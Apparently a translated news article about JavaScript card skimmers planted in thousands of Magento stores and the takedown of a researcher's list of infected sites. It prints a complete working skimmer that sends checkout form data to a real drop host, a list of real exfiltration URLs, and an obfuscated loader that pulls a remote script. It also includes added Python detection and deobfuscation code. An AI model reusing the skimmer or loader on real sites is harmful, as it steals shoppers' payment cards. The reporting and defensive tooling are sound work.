Github removed the list of 5925 online stores with JS skimmers installed

Father



Online skimming is a relatively new form of bank card fraud, and the name says what it is. Where a regular skimmer is an overlay on an ATM card reader that dumps the magnetic stripe, an online skimmer is a software implant on the online store's server that passively intercepts payment data as the user types it into form fields in the browser. Until now carders have mostly targeted transaction servers, where the data is encrypted, but here the information is captured before it is ever encrypted. The card data is then sold on underground forums, and usually an unauthorized person can make payments with these cards without any trouble.

Security experts at Nightly Secure say that online skimming has been gaining popularity rapidly. The spread of this fraud was first discussed in 2015: as of November 2015, 3,501 stores with JS implants on the server had been found among a list of 255,000 online stores, and over the year their number grew by 69%.
A sample JavaScript implant for intercepting payment data looks like this (in this case, the information is sent to http://ownsafety.org/opp.php):

Code:
<script>// <![CDATA[
// whitespace added for readability --wdg
    // read a cookie value by name
    function j(e) {
        var t = "; " + document.cookie,
            o = t.split("; " + e + "=");
        return 2 == o.length ? o.pop().split(";").shift() : void 0
    }
    // tag the victim's session with a timestamp cookie, then hook every button click
    j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
        e("button").on("click", function() {
            var t = "",
                o = "post",
                n = window.location;
            // only act on checkout pages
            if (new RegExp("onepage|checkout").test(n)) {
                // serialise every filled-in form field, card data included, before the form is submitted
                for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
                        var a = c[i].name;
                        "" == a && (a = i), t += a + "=" + c[i].value + "&"
                    }
                if (t) {
                    // asd=1 flags that the harvested data contains a 13-16 digit number (a likely card number)
                    var l = new RegExp("[0-9]{13,16}"),
                        u = new XMLHttpRequest;
                    // POST everything to the drop server, then wipe the console to hide traces
                    u.open(o, e("<div />").html("http://ownsafety.org/opp.php").text(), !0),
                    u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"),
                    u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")),
                    console.clear()
                }
            }
        })
    });
// ]]></script>

Last year, researchers compiled a list of the most frequently used addresses for data collection:

Code:
1860 https://ownsafety.org/opp.php
 390 http://ownsafety.org/opp.php
 309 https://useagleslogistics.com/gates/jquery.php
 100 https://redwiggler.org/wp-content/themes/jquerys.php
  70 https://clickvisits.biz/xrc.php
  28 https://gamula.eu/jquery.php
  23 https://gamula.ru/order.php
  22 https://news-daily.me/gt/
  20 https://antaras.xyz/jquery.php
  17 https://clicksale.xyz/xrc.php
  10 https://ausfunken.com/service/css.php
   9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
   5 https://redwiggler.org/wp-content/themes/jquery.php
   1 /js/index.php
   1 /js/am/extensions/sitemap_api.php
   1 https://infopromo.biz/lib/jquery.php
   1 https://google-adwords-website.biz/gates/jquery.php
   1 https://bandagesplus.com/order.php
   1 http://nearart.com/order.php
   1 http://happysocks.in/jquery.pl

In almost all cases, slight variations of the same code are used.

Such an implant is quite difficult to detect on the server: the code is served by the CMS but runs in the browser. On the three and a half thousand sites mentioned, it worked for several months last year, and on many for six months or more.
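Because the implant runs in the browser, a store operator can still catch it by scanning the JavaScript the site serves for the traits the sample above shows (a checkout-URL gate, bulk harvesting of form fields, a 13-16 digit test, an XHR to a foreign host, a console wipe) and for the drop hosts in the list above. The following scanner is an added example, not code from the article or from Nightly Secure; the indicator regexes, the function names and the two test inputs are mine, the drop-host set is taken from the article's list, and the skimmer input is a condensed copy of the sample quoted above.

```python
import re
from urllib.parse import urlparse

# Drop hosts taken from the article's list of data-collection addresses (page data).
KNOWN_EXFIL_HOSTS = {
    "ownsafety.org", "useagleslogistics.com", "redwiggler.org", "clickvisits.biz",
    "gamula.eu", "gamula.ru", "news-daily.me", "antaras.xyz", "clicksale.xyz",
    "ausfunken.com", "infopromo.biz", "google-adwords-website.biz",
}

# Behavioural traits of the skimmer quoted in the article, as regexes over raw JS.
INDICATORS = [
    ("checkout-page gate", re.compile(r'RegExp\(\s*["\'][^"\']*(?:onepage|checkout)[^"\']*["\']')),
    ("bulk form-field harvesting", re.compile(r'querySelectorAll\(\s*["\'][^"\']*input[^"\']*["\']')),
    ("card-number length test", re.compile(r'\[0-9\]\{1[2-9],1[6-9]\}')),
    ("console cleared after send", re.compile(r'console\.clear\(\)')),
    ("raw XMLHttpRequest", re.compile(r'\bXMLHttpRequest\b')),
]

URL_RE = re.compile(r'https?://[A-Za-z0-9.-]+(?:/[^\s"\'<>]*)?')


def scan_script(js: str, store_host: str) -> list:
    """Return the skimmer indicators found in one JavaScript source served by store_host."""
    findings = [name for name, rx in INDICATORS if rx.search(js)]
    for url in URL_RE.findall(js):
        host = urlparse(url).hostname or ""
        if host in KNOWN_EXFIL_HOSTS:
            findings.append("known skimmer drop host: " + host)
        elif host and host != store_host and not host.endswith("." + store_host):
            findings.append("references third-party host: " + host)
    return findings


def is_suspicious(findings: list) -> bool:
    """A known drop host is conclusive; otherwise require three traits together,
    since any single one (an XHR, a checkout regex) is common in legitimate code."""
    return any(f.startswith("known skimmer drop host") for f in findings) or len(findings) >= 3


# Constructed test inputs: a condensed copy of the article's skimmer sample, and a
# benign checkout helper that only talks to the (hypothetical) store's own domain.
SKIMMER_SAMPLE = r'''
jQuery(function(e){ e("button").on("click", function(){
  var t = "", n = window.location;
  if (new RegExp("onepage|checkout").test(n)) {
    for (var c = document.querySelectorAll("input, select, textarea"), i = 0; i < c.length; i++)
      if (c[i].value.length > 0) t += c[i].name + "=" + c[i].value + "&";
    var l = new RegExp("[0-9]{13,16}"), u = new XMLHttpRequest;
    u.open("post", "http://ownsafety.org/opp.php", !0);
    u.send(t + "&asd=" + (l.test(t) ? 1 : 0)); console.clear();
  }
});});
'''
BENIGN_SAMPLE = r'''
jQuery(function($) {
  $("#checkout-form").on("submit", function(ev) {
    var u = new XMLHttpRequest();
    u.open("POST", "https://shop.example/checkout/validate", true);
    u.send($("#postcode").val());
  });
});
'''

if __name__ == "__main__":
    for label, js in (("skimmer", SKIMMER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = scan_script(js, "shop.example")
        print(label, "SUSPICIOUS" if is_suspicious(found) else "clean", found)
```

Run it over every script the storefront serves (including inline blocks and files pulled from the CMS's `js/` and `skin/` directories), not just the ones the developers know about; the article notes the implant hides inside content the CMS itself delivers. A hit on a known drop host is enough to act on; a three-trait hit deserves a manual look, and a script that posts to a third-party host from a checkout page should be on an allow-list or removed.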

Experts believe that the large number of infected servers points to a high degree of automation in the attack. This is the work not of script kiddies but of skilled professionals, probably from Russia.

Vulnerabilities in the software of online stores are used to plant the implants. Above all this means vulnerable Magento Commerce software, which offers the easiest way to inject code into the CMS, although the script itself works in any online store and does not require Magento. You can check an online store for vulnerabilities on the site MageReports.com.

Although the problem was raised a year ago, it has not gone away over the past year. Even worse, the number of infected online stores has grown one and a half times: in March 2016 the number of stores with skimmers rose from 3,501 to 4,476, and by September 2016 it reached 5,925.

The guys from Nightly Secure published a list of all infected stores to warn customers and to notify the administrators of these stores about the vulnerability. After all, the list included quite popular sites: branches of car manufacturers (Audi ZA), government organizations (NRSC, Malaysia), sites of popular musicians (Bjork), and non-profit organizations (Science Museum, Washington Cathedral).

If a year ago almost all stores carried slight modifications of the same online skimmer, researchers have now found 9 separate versions of the script belonging to 3 different families (source code on Github).

Attackers have become smarter and now use multi-level code obfuscation that is not so easy to unpick. For example, the script can be disguised like this:

(screenshot of the obfuscated script, image not preserved)


Real malware code:
Code:
<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script>
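An analyst does not need to execute this loader to learn what it does: the hex escapes can be decoded, the `'a'+'b'` string splits (which exist so that a grep for `<script` misses the tag) folded back together, and the `window["document"]["write"]` bracket access rewritten as ordinary property access. The decoder below is an added example, not code from the article; the input is the loader quoted above, copied verbatim, and the function names and regexes are mine. It also handles `\uNNNN` escapes and nested bracket chains, which the quoted sample does not use.

```python
import re

# The obfuscated loader quoted in the article (page data, copied verbatim).
OBFUSCATED = r'''<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');//4079</script>'''

CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a' + 'b'
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')              # \x41
UNI_RE = re.compile(r'\\u([0-9a-fA-F]{4})')              # \u0041
BRACKET_RE = re.compile(r'(\w+)\["(\w+)"\]')             # obj["name"]
SRC_RE = re.compile(r'src="([^"]+)"')


def fold_concatenations(js: str) -> str:
    """Merge chains of single-quoted literals joined by '+' into one literal."""
    prev = None
    while prev != js:
        prev, js = js, CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", js)
    return js


def decode_escapes(js: str) -> str:
    """Replace \\xNN and \\uNNNN escapes with the characters they encode."""
    js = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return UNI_RE.sub(lambda m: chr(int(m.group(1), 16)), js)


def undo_bracket_access(js: str) -> str:
    """Rewrite window["document"]["write"] as window.document.write (repeats for nesting)."""
    prev = None
    while prev != js:
        prev, js = js, BRACKET_RE.sub(r'\1.\2', js)
    return js


def deobfuscate(js: str) -> dict:
    """Return the readable form of the loader and every script URL it injects."""
    cleaned = undo_bracket_access(decode_escapes(fold_concatenations(js)))
    return {"decoded": cleaned, "loaded_scripts": SRC_RE.findall(cleaned)}


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED)
    print(result["decoded"])
    print("injects:", result["loaded_scripts"])
```

Decoding shows the loader is nothing more than `document.write` of a second `<script>` tag, so the actual skimmer lives at the URL it injects; that URL, not the loader text, is what to block at the proxy and to compare against the drop-host list. The order of the three passes matters: literals are folded while their contents are still escape sequences (so a decoded quote character cannot confuse the folding), and escapes are decoded before the bracket rewrite (so the property names are readable).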

The authors also improved the mechanism for intercepting payment card data. Previously the malware simply intercepted pages with the string checkout in the URL, but now it also recognizes the popular payment plugins Firecheckout, Onestepcheckout, and PayPal.

Specialists from Nightly Secure tried to contact a number of stores (about 30) to inform them about the installed skimmer, but most of the stores did not respond, and the others were surprisingly careless. One said it was not their problem, because the payments are processed by a third-party company. A second said it was just a JavaScript error that posed no threat. A third said there could be no danger at all, because "the store operates over HTTPS". None of these objections hold: the skimmer reads the form fields in the browser before they are submitted, so the payment processor and the TLS connection never see anything unusual. The author submitted the list of stores with skimmers to Google to be blacklisted by Chrome Safe Browsing.

A list of all stores with skimmers was originally published on Github. And that's where the fun started. Soon, Github removed the publication of the results of the study of online stores from its site without warning.

Apparently, Github carried out the censorship according to its standard procedure, having received a DMCA request from one of the stores. Of course, it is unpleasant for a store when someone finds a vulnerability and tells the whole world about it.

Yesterday, the author moved the results of the online store security study to Gitlab hosting. Today, the page at that address returns a 404 error. A few hours ago the author received an email from Gitlab explaining the reasons for the deletion: according to the administration, the publication of the list of vulnerable stores is considered a "blatant case" that cannot be resolved. Therefore the list was deleted (UPD: access was restored, and the director of Gitlab apologized).

Copy of the list in the web archive
Copy on Pastebin


Note that the list of stores with online skimmers installed includes 44 domains in the .RU zone.

Let's hope that the administrators of these stores will quickly install the version of Magento with the latest patches and compensate the customers whose payment card copies were leaked to the black market.